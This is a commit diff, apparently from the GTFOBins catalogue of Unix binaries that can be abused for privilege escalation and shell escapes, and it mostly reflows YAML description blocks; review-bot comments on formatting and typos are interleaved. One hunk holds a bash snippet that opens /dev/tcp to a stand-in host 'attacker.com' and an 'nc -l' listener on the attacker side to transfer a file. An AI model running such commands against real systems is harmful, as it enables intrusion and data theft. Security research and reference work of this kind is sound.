Fix YAML literal blocks

Andrea Cardaci 2018-06-01 12:40:05 +02:00
parent b96f6e9a49
commit 5a1c87e7c5
8 changed files with 58 additions and 21 deletions

@ -1,55 +1,84 @@
execute-interactive: execute-interactive:
label: Interactive execute label: Interactive execute
description: It executes interactive commands that may be used to break out from restricted shells. description: |
It executes interactive commands that may be used to break out from
restricted shells.
execute-non-interactive: execute-non-interactive:
label: Non-interactive execute label: Non-interactive execute
description: It executes non-interactive commands that may be used to break out from restricted shells. description: |
It executes non-interactive commands that may be used to break out from
restricted shells.
suid-enabled: suid-enabled:
label: SUID label: SUID
description: It runs with the SUID bit set and may be exploited to access the file system, escalate or maintain access with elevated privileges working as a SUID backdoor. If it is used to run `/bin/sh -p`, omit the `-p` on systems like Debian that allow to run a SUID shell by default. description: |
It runs with the SUID bit set and may be exploited to access the file
system, escalate or maintain access with elevated privileges working as a
SUID backdoor. If it is used to run `/bin/sh -p`, omit the `-p` on systems
like Debian that allow to run a SUID shell by default.
suid-limited: suid-limited:
label: Limited SUID label: Limited SUID
description: It runs with the SUID bit set and may be exploited to access the file system, escalate or maintain access with elevated privileges working as a SUID backdoor. Running `/bin/sh` only works on Debian systems that allow SUID shell execution by default. description: |
It runs with the SUID bit set and may be exploited to access the file
system, escalate or maintain access with elevated privileges working as a
SUID backdoor. Running `/bin/sh` only works on Debian systems that allow
SUID shell execution by default.
sudo-enabled: sudo-enabled:
label: Sudo label: Sudo
description: It runs in privileged context and may be used to access the file system, escalate or maintain access with elevated privileges if enabled on `sudo`. description: |
It runs in privileged context and may be used to access the file system,
escalate or maintain access with elevated privileges if enabled on `sudo`.
download: download:
label: Download label: Download
description: It can download remote files. description: |
It can download remote files.
upload: upload:
label: Upload label: Upload
description: It can exfiltrate files on the network. description: |
It can exfiltrate files on the network.
bind-shell-interactive: bind-shell-interactive:
label: Interactive bind shell label: Interactive bind shell
description: It can bind a shell to a local port to allow remote network access. description: |
It can bind a shell to a local port to allow remote network access.
reverse-shell-interactive: reverse-shell-interactive:
label: Interactive reverse shell label: Interactive reverse shell
description: It can send back a reverse shell to a listening attacker to open a remote network access. description: |
It can send back a reverse shell to a listening attacker to open a remote
network access.
bind-shell-non-interactive: bind-shell-non-interactive:
label: Non-interactive bind shell label: Non-interactive bind shell
description: It can bind a non-interactive shell to a local port to allow remote network access. description: |
It can bind a non-interactive shell to a local port to allow remote network
access.
reverse-shell-non-interactive: reverse-shell-non-interactive:
label: Non-interactive reverse shell label: Non-interactive reverse shell
description: It can send back a non-interactive reverse shell to a listening attacker to open a remote network access. description: |
It can send back a non-interactive reverse shell to a listening attacker to
open a remote network access.
load-library: load-library:
label: Library load label: Library load
description: It loads shared libraries that may be used to run code in the binary execution context. description: |
It loads shared libraries that may be used to run code in the binary
execution context.
file-read: file-read:
label: File read label: File read
description: It reads files and may be used to do privileged reads or disclose files outside a restricted file system. description: |
It reads files and may be used to do privileged reads or disclose files
outside a restricted file system.
file-write: file-write:
label: File write label: File write
description: It writes files and may be used to do privileged writes or write files outside a restricted file system. description: |
It writes files and may be used to do privileged writes or write files
outside a restricted file system.
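
Review bot: every `description` in this file now uses the literal indicator `|`, which keeps each wrap point as a real newline inside the value and leaves a trailing newline, including on one-line entries such as `It can download remote files.`. If whatever consumes these strings expects a single line, the folded form `description: >-` keeps the same wrapping in the source while producing one line with no trailing newline. If the embedded line breaks are harmless where the text is rendered, a one-line comment at the top of the file saying so would save the next editor from wondering.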

@ -29,7 +29,7 @@ functions:
3<>/dev/tcp/$RHOST/$RPORT \ 3<>/dev/tcp/$RHOST/$RPORT \
| { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE' | { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE'
- description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"` on the attacker box to send the file. - description: Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"` on the attacker box to send the file.
code: |- code: |
export RHOST=attacker.com export RHOST=attacker.com
export RPORT=12345 export RPORT=12345
export LFILE=file_to_get export LFILE=file_to_get
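
Review bot: the changed line swaps `code: |-` for `code: |`, so this snippet's value now keeps its final newline instead of stripping it; please confirm the other `code:` entries use the same indicator and that the rendered snippet does not gain an empty last line. Separately, the `description` on the context line just above is still a long plain scalar containing backticks, `<` and double quotes, while the rest of this commit moves long descriptions into block scalars; converting it here would keep the file consistent.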

@ -1,5 +1,7 @@
--- ---
description: BusyBox may contain many UNIX utilities, run `busybox --list-full` to check what GTFBins binaries are supported. Here some example. description: |
BusyBox may contain many UNIX utilities, run `busybox --list-full` to check
what GTFBins binaries are supported. Here some example.
functions: functions:
execute-interactive: execute-interactive:
- code: busybox sh - code: busybox sh
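
Review bot: the rewrapped description still ends with `Here some example.`; since the text is being touched anyway, correct it to `Here are some examples.` in the same change. The comma before `run` could also become a full stop or semicolon so the instruction reads as its own sentence.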

@ -1,6 +1,7 @@
--- ---
description: | description: |
`ld.so` is the Linux dynamic linker/loader, its filename and location might change across distributions. The proper path is can be obtained with: `ld.so` is the Linux dynamic linker/loader, its filename and location might
change across distributions. The proper path is can be obtained with:
``` ```
$ strings /proc/self/exe | head -1 $ strings /proc/self/exe | head -1
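
Review bot: the second line of the rewrapped description carries over the typo `The proper path is can be obtained with:`; drop the stray `is` while the line is being reflowed. Everything else in this hunk is a pure rewrap of text that was already inside a `|` block, so the value only gains one line break.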

@ -1,5 +1,6 @@
--- ---
description: The read file content is corrupted by being sorted. description: |
The read file content is corrupted by being sorted.
functions: functions:
sudo-enabled: sudo-enabled:
- code: | - code: |

@ -1,5 +1,6 @@
--- ---
description: It can only append data if the destination exists. description: |
It can only append data if the destination exists.
functions: functions:
sudo-enabled: sudo-enabled:
- code: | - code: |

@ -1,5 +1,7 @@
--- ---
description: The read file content is corrupted by replacing occurrences of `$'\b_'` to terminal sequences and by converting tabs to spaces. description: |
The read file content is corrupted by replacing occurrences of `$'\b_'` to
terminal sequences and by converting tabs to spaces.
functions: functions:
sudo-enabled: sudo-enabled:
- code: | - code: |
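
Review bot: the description reads "replacing occurrences of `$'\b_'` to terminal sequences"; the construction should be "replacing ... with terminal sequences", and this rewrap is a good moment to fix it. The backslash in `$'\b_'` is taken literally in both the old plain scalar and the new literal block, so the escape itself is unaffected by the change.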

@ -1,5 +1,6 @@
--- ---
description: The read file content is corrupted by squashing multiple adjacent lines. description: |
The read file content is corrupted by squashing multiple adjacent lines.
functions: functions:
sudo-enabled: sudo-enabled:
- code: | - code: |